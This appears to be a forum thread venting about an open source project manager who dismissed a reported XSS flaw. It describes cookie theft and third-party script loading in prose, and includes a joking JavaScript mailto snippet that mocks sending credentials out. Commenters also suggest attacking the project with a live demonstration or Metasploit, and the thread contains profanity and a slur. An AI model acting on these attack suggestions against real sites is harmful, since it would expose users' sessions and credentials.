Project Managers
-
Take an open source project. Take an XSS vulnerability that isn't hard to make happen with a pinch of social engineering.
Said XSS applies in an environment where privileged accounts are already the current situation and allow any unsanitised JavaScript to be run that you feel like running. Like, say, snarfing all the cookies and sending them off to a third party. Or for that matter, just grabbing a third party script and having that run under the current user's credentials.
There are two vectors for this. Both situations were described in detail and relayed to the appropriate team.
Project manager dismisses this as a 'silly issue'. Mind you, said project manager also dismisses my comments as doom-mongering in general.
Said open source project is 'proud of its security record'.
-
Is it a forum software, by any chance?
Also, IT'S OPEN SOURCE FIX IT YOURSELF... oh wait.
-
It might be a forum software.
And I could fix it in the in-dev build but that doesn't help for the existing production installs.
Did I mention, last week they pushed out the last maintenance edition which they're still not running on their own site (it's non-security related), and they're not able to upgrade to that last maintenance edition because the last update was botched... back in January?
And they wonder why I'm full of doom for them.
-
And they wonder why I'm full of doom for them.
You know, as well as I do, that it has to be done...
https://www.youtube.com/watch?v=LaEYYHsSn9o
Filed under: Taking one for the team
-
So perform an unannounced demonstration. On the program manager.
Filed Under: we need a new tag cloud to attack
-
I thought about that, but I don't want to do it by abusing regular users or displacing trust in the platform any more than I have to.
-
Said open source project is 'proud of its security record'.
Not Zamfoo or openssl then..
-
No. It is a place where I am, regrettably, a minor celebrity and former team member until I refused to put up with their bullshit. TRWTF is that I rejoined and tried to work with them and even 4 years later they're still retarded.
-
window.open('mailto:test@example.com?subject=subject&body=I_The_Project_Manager_Who_Shall_Not_Be_Respected_Resign_this_Day_Because_I_Ignored_A_Vulnerability_That_Prompted_This_Email_To_You_My_Credentials_Are_-Credentials-_And_They_Can_Be_Used_By_Whoever');
On an unrelated note, apparently doing an underscore, dash, text, dash, underscore, text results in text formatting from the last underscore.
@sam Can we have an option that is just 'Disable all markdown, all html, all types of text parsing, and just let me type text' option / checkbox in a post itself?
-
Can we have an option that is just 'Disable all markdown, all html, all types of text parsing, and just let me type text' option / checkbox in a post itself?
Personally, I'd like to see "raw" concept extended to the whole page.
Filed under: you'd even be able to search it using SSDS!
-
We don't call them project manglers for nothing.
-
Isn't that why we have the backtick for code formatting?
-
dismisses my comments as doom-mongering in general.
You DO sound like a miserable bastard
-
Doesn't change the fact that I'm fucking right about the doom in question. Shit's been going wrong for the last 5 years, and literally nothing has changed about the situation. The same problems are present, the same broken mindsets, it's only the names posting the regurgitated BS that have changed.
-
The obvious solution is to sick metasploit at them. If every scriptkiddie's favorite toy can exploit the issue then they might care.
-
It does require a little more finesse than that. It can't just be exploited with any old tool, it does require some social engineering - but not a lot. The best part is that it would be abusing a 'trusted resource site' in the process.
-
Personally, I'd like to see "raw" concept extended to the whole page.
I am not in agreeing with you here. that would be a terrible torment on eyes.
-
Doesn't change the fact that I'm fucking right about the doom in question. Shit's been going wrong for the last 5 years, and literally nothing has changed about the situation. The same problems are present, the same broken mindsets, it's only the names posting the regurgitated BS that have changed.
I was joking, fella! Had hoped the smiley would show that... open source: just. say. no.
-
Oh, that's the thing... I DO sound like a miserable bastard because this open source project has been a large part of what I've done over the last few years and it's messed with my head on too many occasions.
Yes, I have been a doom-monger. But it doesn't change the fact I'm right about it.
-
Yes, I have been a doom-monger. But it doesn't change the fact I'm right about it.
The standard term for that is “Cassandra”.